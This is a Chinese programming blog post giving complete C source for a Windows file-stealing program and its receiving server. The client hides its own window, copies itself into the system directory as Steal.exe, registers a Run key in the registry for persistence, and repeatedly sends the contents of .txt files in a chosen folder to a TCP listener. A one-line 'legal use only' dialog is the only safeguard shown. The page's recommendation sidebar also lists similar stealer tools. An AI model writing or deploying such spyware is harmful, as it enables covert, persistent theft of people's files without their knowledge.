Windows编程 + 窃取对方主机文件程序+加入注册表+自动隐藏自身

最新推荐文章于 2023-06-21 18:58:06 发布
最新推荐文章于 2023-06-21 18:58:06 发布
阅读量274 收藏 3
点赞数 2
分类专栏: windows编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43262690/article/details/112985794
版权

Windows编程

窃取对方自定义目录下的文件
加入注册表+自动隐藏自身
我这里是如图所示的目录
C:\Binggo下有一个123.txt的文件里面内容随便写(被窃取端)

在这里插入图片描述
在这里插入图片描述
实时窃取我后面新建了1212.txt也能窃取的到
在这里插入图片描述
完整代码如下,大佬勿喷

被窃取端代码

#include<stdio.h>
#include<windows.h>
#include<io.h>
#pragma comment(lib, "ws2_32.lib")
int SendtoServer(const char* path)
{
	//初始化网络库
	WORD wVersionRequested;
	WSADATA wsaData;
	int err;
	char sendBuf[1024] = { 0 };
	wVersionRequested = MAKEWORD(2, 2);
	//初始化套接字库
	err = WSAStartup(wVersionRequested, &wsaData);
	if (err != 0)
	{
		printf("WSAStartup errNum=%d\n", GetLastError());
		return 0;
	}
	if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2)
	{
		printf("LOBYTE errorNum= %d\n", GetLastError());
		WSACleanup();
		return-1;
	}
	//安装电话机 选中函数 按F1
	SOCKET sockCli = socket(AF_INET, SOCK_STREAM, 0);
	//配置连接的服务器
	SOCKADDR_IN addrSrv;
	addrSrv.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");//端口
	addrSrv.sin_family = AF_INET;//地址类型
	addrSrv.sin_port = htons(6000);//端口
	//连接服务器
	if (SOCKET_ERROR == connect(sockCli, (SOCKADDR*)&addrSrv, sizeof(SOCKADDR)))
	{
		printf("connect errNum= %d\n", GetLastError());
		return -1;
	}
	//读取文件内容
	FILE* fp = fopen(path, "rb");
	int len = fread(sendBuf,1,1024,fp);
	fclose(fp);
	//char recvBuf[100] = { 0 };
	//int  iLen = recv(sockCli, recvBuf, 100, 0);
	//printf("recvBuf=%s\n", recvBuf);
	//char sendBuf[100] = "ni hao";
	//发送数据
	int iLen = send(sockCli, sendBuf, strlen(sendBuf)+1, 0);
	if (iLen < 0)
	{
		printf("send error=%d\n", GetLastError());
		return -1;
	}
	closesocket(sockCli);
	WSACleanup();
	return 0;
}
int DoSteal(const char *szPath)
{
	WIN32_FIND_DATA FindFileData;//FindFileData表示文件
	HANDLE hListFile;//文件用句柄来标识
		char szFilePath[MAX_PATH] = { 0 };
		strcpy(szFilePath, szPath);
		strcat(szFilePath, "\\*");
		//找到第一个文件
		hListFile=FindFirstFile(szFilePath, &FindFileData);
	do
	{
		char mypath[MAX_PATH] = {0};
		strcpy(mypath, szPath);
		strcat(mypath, FindFileData.cFileName);
		if (strstr(mypath, ".txt"))
		{
			SendtoServer(mypath);
		}
		printf("mypath = %s\n", mypath);
	} while (FindNextFile(hListFile, &FindFileData));
	return 0;
}
void AddToSystem()
{
	HKEY hKEY;
	char CurrentPath[MAX_PATH];
	char SysPath[MAX_PATH];
	long ret = 0;
	LPSTR FileNewName;
	LPSTR FileCurrentName;
	DWORD type = REG_SZ;
	DWORD size = MAX_PATH;
	LPCTSTR Rgspath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";

	GetSystemDirectory(SysPath, size);
	GetModuleFileName(NULL,CurrentPath,size);

	FileCurrentName = CurrentPath;
	FileNewName = lstrcat(SysPath,"\\Steal.exe");
	struct _finddata_t Steal;
	printf("retl = %d,FileNewName=%s\n",ret,FileNewName);
	if (_findfirst(FileNewName, &Steal) != -1)
	{
		return;
	}
	printf("ret2 = %d\n",ret);
	int ihow = MessageBox(0, "该程序只允许用于合法的用途", "警告", MB_YESNOCANCEL | MB_ICONWARNING | MB_TOPMOST);
	if (ihow == IDCANCEL)
	{
		exit(0);
	}
	if (ihow == IDNO)
	{
		return;//只执行一次
	}
	//复制文件
	ret = CopyFile(FileCurrentName, FileNewName, TRUE);
	if (!ret)
	{
		return;
	}
	//加入注册表
	printf("ret = %d\n",ret);
	ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE,Rgspath,0,KEY_WRITE,&hKEY);
	if (ret!=ERROR_SUCCESS)
	{
		RegCloseKey(hKEY);
			return;
	}
	ret = RegSetValueEx(hKEY,"Steal",NULL,type,(const unsigned char*)FileNewName,size);
	if (ret != ERROR_SUCCESS)
	{
		RegCloseKey(hKEY);
		return;
	}
	RegCloseKey(hKEY);
}
void HideMyself()
{
	HWND hwnd = GetForegroundWindow();
	ShowWindow(hwnd,SW_HIDE);
}

int main()
{
	printf("Steal\n");
	//隐藏自身
	HideMyself();
	//添加到启动项
	AddToSystem();
	
	//窃取文件
	while (true)
	{
		DoSteal("C:\\Binggo\\");//注意 \\ 目录自定义
		Sleep(5000);
	}
	
	system("pause");
	return 0;
}

窃取端代码

#include <stdio.h>
#include<windows.h>
#pragma comment(lib, "ws2_32.lib")
#define MAX_SIZE 1024
//控制台打印错误码函数
void ErrorHanding(const char*msg)
{
	fputs(msg, stderr);
	fputc('\n', stderr);
	exit(1);
}
int main()
{
	//初始化网络库
	WORD wVersionRequested; //unsigned short
	WSADATA wsaData;
	int err;
	char msg[MAX_SIZE] = {0};
	wVersionRequested = MAKEWORD(2, 2);//将两个byte合并成一个word
	//初始化套接字库
	err = WSAStartup(wVersionRequested, &wsaData);
	if (err != 0)
	{
		ErrorHanding("WSAStartup err");
	}
	if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2)
	{
		printf("LOBYTE errorNum= %d\n", GetLastError());
		WSACleanup();
		ErrorHanding("LOBYTE error");
		return-1;
	}
	SOCKET hServerSock = socket(PF_INET, SOCK_STREAM, 0);
	if (INVALID_SOCKET == hServerSock)//INVALID_SOCKET=0
	{
		ErrorHanding("socket err");
	}
	SOCKADDR_IN addrSrv;//结构体
	addrSrv.sin_addr.S_un.S_addr = htonl(INADDR_ANY);//地址0.0.0.0
	addrSrv.sin_family = AF_INET;//地址类型
	addrSrv.sin_port = htons(6000);//端口
	if (SOCKET_ERROR == bind(hServerSock, (SOCKADDR*)&addrSrv, sizeof(SOCKADDR)))
	{
		ErrorHanding("sock error");
	}
	//监听listen
	if (SOCKET_ERROR == listen(hServerSock, 5))
	{
		ErrorHanding("listen error");
	}
	SOCKADDR_IN addrCli;
	int cliAdrSize = sizeof(SOCKADDR_IN);
	SOCKET cliSock;
	int strLen = 0;
	while(TRUE)
	{
		cliSock = accept(hServerSock, (SOCKADDR*)&addrCli, &cliAdrSize);
		if (SOCKET_ERROR == cliSock)
		{
			ErrorHanding("accept error");
		}
		memset(msg,0,MAX_SIZE);
		while ((strLen= recv(cliSock,msg,MAX_SIZE,0))!=0)
		{
			printf("Server msg=%s\n",msg);
		}
		closesocket(cliSock);
	}
	closesocket(hServerSock);
	WSACleanup();
	system("pause");
	return 0;
}
箭仔
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网站源码偷取工具.zip
07-29
很好的一个软件,亲测可用! 很好的一个软件,亲测可用! 很好的一个软件,亲测可用! 很好的一个软件,亲测可用! 很好的一个软件,亲测可用! 很好的一个软件,亲测可用!
网站源码偷取工具(网页HTML js等)
04-13
网站源码偷取工具(网页HTML js等)偷取各种网页数据 HTML代码
隐藏任意进程,目录/文档,注册表,端口
编程爱好者
02-19 541
来源: 作者: 发布时间:2007-05-24    
隐藏任意进程,目录/文件注册表,端口
goingup的专栏
04-15 1783
[转载]隐藏任意进程,目录/文件注册表,端口Author : sinister Email   : sinister@whitecell.org HomePage: http://www.whitecell.org   查找进程,目录/文件注册表等操作系统将最终调用 ZwQueryDirectoryFile,ZwQuerySystem
安全开发--20--窃取主机上的指定文件
武天旭的博客
11-16 188
前面我们尝试了邮件外发文件和FTP外发文件等两种最常用的外发方式,那现在我们尝试一种更灵活的方式,即将以上两种方式聚合,这样就可以通过它来调用前面的任意一种方式了。
使用VB Visual Studio.Net创建密码窃取程序
SAKAISON的博客
09-08 983
SO EASY啊 打开电脑--点开visual studio 2013--创建程序--输进代码--“my project”--“add resource”...resource..source..rce..ce..e....!!! 我没有resource。 万事俱备,SAKAISON‘只’差个Nirsoft的密码恢复程序。。谁扔我一个呀 此教程将介绍如何使用VB的Visual Studi
NotePad++的nppftp文件
10-23
NotePad++是一款非常受欢迎的免费源代码编辑器,尤其在编程社区中被广泛使用,因为它支持多种编程语言的语法高亮,并且具有轻量级、高效的特点。在这款编辑器中,NppFTP是一个非常实用的插件,它提供了FTP(文件传输...
STM32F7系列+W5500程序.rar
01-11
STM32F7系列是意法半导体(STMicroelectronics)推出的高性能微控制器,基于...这些程序通常包含驱动程序、网络协议栈的接口函数和应用层的业务逻辑代码,对于熟悉嵌入式网络编程的开发者来说,是一个宝贵的参考资料。
snort+base.txtsnort+base.txtsnort+base.txtsnort+base.txt
07-14
根据提供的文件信息,可以看出主题与Snort及其配置文件(snort+base.txt)有关。由于描述部分的内容重复无实质意义,我们将重点放在标题、标签以及部分内容上,从中提炼出相关知识点。 ### Snort简介 Snort是一款...
检索程序是否被感染Srv+哈勃分析源码
02-27
描述中的“非常方便的懒人查毒神器,附带成品,把软件拖入程序即可分析是否感染SRV+哈勃分析”意味着这个工具设计得相当用户友好,只需要简单地将待检查的程序拖放到指定的程序上,就能自动进行分析,判断该程序是否...
商业编程-源码-通过网络传送文件程序代码.zip
06-23
这个压缩包"商业编程-源码-通过网络传送文件程序代码.zip"显然包含了用于实现这一功能的源代码。下面将详细介绍这个主题,包括相关知识点、技术原理以及可能涉及的编程语言。 1. **网络基础**:文件传输依赖于TCP...
怀疑 Windows 流氓软件后台偷偷读文件,教你如何实锤
m0_46163918的博客
12-04 3185
众所周知,Windows 系统流氓软件众多,其中不乏出身大厂的产品。这些带有流氓性质的软件,很多都会偷偷扫描系统数据,读取用户文件,造成电脑卡顿拖慢不说,还严重侵害了个人隐私,造成巨大的安全隐患!想想你存储的小电影、通讯录乃至密码都被流氓软件看在眼里,甚至上传服务器…… 不寒而栗啊。 很多大厂出品的软件,都被干出过类似的事情。例如某通讯 IM 软件,被爆出过偷偷扫描和软件功能无关的目录;某下载工具,会扫描硬盘的资源并私自上传到服务器为其他用户加速…… 但这些行为,很多也只是存在于口口相传中,要如何实锤?这
ASP小偷代码(远程数据获取)程序入门教程
02-23 692
这里所说的“小偷”指的是在asp中运用xml中的xmlhttp组件提供的强大功能,把远程网站上的数据(图片,网页及其他文件)抓取到本地,经过各种处理后显示到页面上或者存储进数据库的一类程序。你可以通过这种小偷程序,完成过去一些似乎完全不可能实现的任务,比如说把某个站的页面偷梁换柱后变成自己的页面,或者把某个站的一些数据(文章,图片)保存到本地数据库中加以利用。“小偷”的优点有:无须维护网站,因为小
C++实现U盘小偷程序源码,免费分享
bukeyizhongwen的博客
06-21 1076
顾名思义,所谓的U盘小偷程序不就是在背地里偷偷的考取U盘内容的程序吗?但是本文志不在此,而是一起去研究核心中的技术,因为这涉及到违法犯罪,所以各位看官一定不要去实战。
网络编程实战案例——窃取文件
八块吮指原味鸡的博客
09-17 414
通过“窃取文件”的比喻,实现一个简单的TCP通信的案例
偷窃工作
weixin_26752289的博客
08-11 120
Before talking about Work Stealing, we need to talk about task management. We could use Tomcat as one example. Tomcat will use multiple threads to handle concurrent connections. The number of threads ...
005 - 马科维茨投资组合理论实现
08-10
python基于tushare实现马科维茨投资组合理论实现
基于ASP的学生信息档案管理系统毕业论文及源码.rar
最新发布
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
为什莫远程文件包含漏洞危害更大
05-10
远程文件包含漏洞危害更大是因为攻击者可以通过远程文件包含漏洞,将自己服务器上的恶意文件下载到被攻击者的服务器上,从而实现对被攻击者服务器的控制。攻击者可以利用这个漏洞来执行任意代码,包括但不限于窃取敏感信息、篡改数据、破坏系统等。此外,远程文件包含漏洞还可以被用来进行跨站脚本攻击(XSS)和跨站请求伪造攻击(CSRF),从而进一步危害被攻击者的系统和用户信息安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值